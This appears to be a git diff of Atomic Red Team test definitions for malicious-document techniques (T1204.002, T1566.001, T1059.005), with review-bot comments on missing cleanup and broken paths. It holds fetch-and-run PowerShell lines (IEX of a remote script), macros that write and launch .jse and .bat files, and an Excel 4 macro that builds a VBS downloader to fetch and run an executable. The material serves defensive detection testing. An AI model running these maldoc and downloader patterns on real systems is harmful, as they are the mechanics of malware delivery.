+ command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
- name: Encoded VBS code execution
- auto_generated_guid:
+ auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
description: |
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 69c4670c..245c1eae 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -18,6 +18,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #5 - Office launching .bat file from AppData](#atomic-test-5---office-launching-bat-file-from-appdata)
+- [Atomic Test #6 - Excel 4 Macro](#atomic-test-6---excel-4-macro)
+
@@ -38,7 +40,6 @@ References:
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -46,31 +47,31 @@ References:
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-$ms_office_version = #{ms_office_version}
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -127,7 +128,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -135,30 +135,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
-#### Cleanup Commands:
-```powershell
-$ms_office_version = #{ms_office_version}
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -181,7 +178,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)|
#### Attack Commands: Run with `powershell`!
@@ -189,31 +185,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
-#### Cleanup Commands:
-```powershell
-$ms_office_version = #{ms_office_version}
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
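Review bot: Dropping the Cleanup Commands block (old L663-668) leaves the file the macro writes to `#{jse_path}` (default `C:\Users\Public\art.jse`, L651) on disk after the test, whereas the parallel change to T1566.001 at L871-876 keeps a cleanup that removes it. The new side should restore a `#### Cleanup Commands:` block with a powershell fence containing `Remove-Item #{jse_path} -ErrorAction Ignore`, matching T1566.001. Since this .md appears to be generated from T1204.002.yaml (see the yaml hunk later in the diff), the fix presumably belongs in the yaml source rather than here.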
@@ -233,8 +225,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| bat_path | Path to malicious .bat file | String | $env:temp+"\art1204.bat"|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | string | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
+| bat_path | Path to malicious .bat file | String | $("$env:temp\art1204.bat")|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -243,32 +234,135 @@ Microsoft Office creating then launching a .bat script from an AppData directory
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
-$bat_path = #{bat_path}
-$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
```
-#### Cleanup Commands:
-```powershell
-$ms_office_version = #{ms_office_version}
-if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Excel 4 Macro
+This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
+VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
+
+A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
+you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
+with Excel matches that of the local system. This username can be found under Files -> Options -> Username
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| download_url | Download URL | String | https://live.sysinternals.com/procexp.exe|
+| uname | Username for pathing | String | $env:Username|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
+$fname1 = "$env:TEMP\procexp.exe"
+if (Test-Path $fname) {
+ Remove-Item $fname
+ Remove-Item $fname1
+}
+
+$xlApp = New-Object -COMObject "Excel.Application"
+$xlApp.Visible = $True
+$xlApp.DisplayAlerts = $False
+$xlBook = $xlApp.Workbooks.Add()
+$sheet = $xlBook.Excel4MacroSheets.Add()
+
+if ("#{uname}" -ne "") {
+ $sheet.Cells.Item(1,1) = "#{uname}"
+} else {
+ $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
+}
+
+$sheet.Cells.Item(2,1) = "procexp.exe"
+$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
+$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
+$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
+$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
+$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
+$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
+$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
+$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
+$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
+$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
+$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
+$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
+$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
+$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
+$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
+$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
+$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
+$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
+$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
+$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
+$sheet.Cells.Item(23,1) = "=HALT()"
+$sheet.Cells.Item(1,1).Name = "runme"
+$xlApp.Run("runme")
+$xlApp.Quit()
+
+[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
+[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
+[System.GC]::Collect()
+[System.GC]::WaitForPendingFinalizers()
+
+Remove-Variable xlBook
+Remove-Variable xlApp
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "procexp*" -ErrorAction Ignore
+Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
+Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft Excel must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "Excel.Application" | Out-Null
+ Stop-Process -Name "Excel"
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
```
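Review bot: At L704 the rewritten `$macrocode` interpolates `#{bat_path}` in the `Open` statement but still references `$bat_path` in the `Shell` call, and the `$bat_path = #{bat_path}` assignment was removed at L701; inside a double-quoted PowerShell string an unset `$bat_path` expands to nothing, so the macro runs `cmd.exe /c ` with an empty command and test #5 no longer does what its description says. Replace `$bat_path` in the `Shell(...)` argument with `#{bat_path}` so both halves agree, and quote `-officeProduct "#{ms_product}"` at L705 as L622 and L661 do. The removed cleanup at L707-712 also means the `.bat` written to `#{bat_path}` is left behind; a `#### Cleanup Commands:` block with `Remove-Item #{bat_path} -ErrorAction Ignore` would mirror the cleanup test #6 provides at L818-823. In test #6, the macro cells at L786, L797, L801 and L803 hardcode `C:\Users\<A1>\AppData\Local\Temp`, while the pre-check at L764-765 and the cleanup at L821-822 use `$env:TEMP`; on a host with a relocated profile or a non-default TEMP the two paths presumably diverge and the cleanup misses the written files. The pre-check at L766-769 likewise removes `procexp.exe` only when the `.vbs` exists — two independent `Remove-Item ... -ErrorAction Ignore` lines, as in the cleanup, avoid the leftover.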
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 17ff1517..a967bf64 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -165,7 +165,7 @@ atomic_tests:
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
- name: Excel 4 Macro
- auto_generated_guid:
+ auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md
index bffe1cd7..dc142392 100644
--- a/atomics/T1566.001/T1566.001.md
+++ b/atomics/T1566.001/T1566.001.md
@@ -63,7 +63,6 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
#### Attack Commands: Run with `powershell`!
@@ -72,27 +71,30 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependent registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index fdff4730..0003e3ee 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -625,3 +625,5 @@ f38e9eea-e1d7-4ba6-b716-584791963827
60e860b6-8ae6-49db-ad07-5e73edd88f5d
9215ea92-1ded-41b7-9cd6-79f9a78397aa
9a2915b3-3954-4cce-8c76-00fbf4dbd014
+e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+4ea1fc97-8a46-4b4e-ba48-af43d2a98052